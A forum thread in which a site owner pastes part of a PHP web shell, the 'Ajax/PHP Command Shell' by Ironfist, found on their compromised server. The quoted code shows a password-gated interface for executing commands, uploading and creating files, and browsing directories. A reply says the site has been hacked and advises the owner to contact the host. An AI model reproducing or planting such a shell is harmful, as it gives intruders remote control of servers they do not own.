document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";

}
document.getElementById('commandtab').innerHTML = newhtml;
}
</script>
</head>
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
<table border=1 width=100% height=100%>
<td width=15% valign=top>

<form name="extras"><br>
<center><b>Quick Commands</b><br>

<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
<?php
foreach($functions as $name => $execute)
{
print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
}
?>

</center>

</div>
</form>
<center><b>Command history</b><br></center>
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
<br>
<center><b>About</b><br></center>
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
<br>
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
<br>
Version <?php print $version; ?>

<br>
<br>

<br>Thanks to everyone @
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
<br>
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
<br>
and special greetings to everyone in rootshell
</div>

</td>
<td width=70%>
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>

</font></td>
<tr>
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>

<tr>
<td height=1% width=100% valign=top>
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
</form>
</div>
</td>
</table>
</td>
</table>
</body>
</html>
<?php
}
} else {
print "<center><table border=0 height=100%>
<td valign=middle>
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
</form>";
}

.
.
.
I think they wanted to hunt passwords. Isn't it ?If yes, can i realize where did they want to save log file !?

I know what it decodes to, but didn't feel it was important to post the code. The bottom line is you've been hacked. You need to talk to your host to figure out how this happened and then fix it.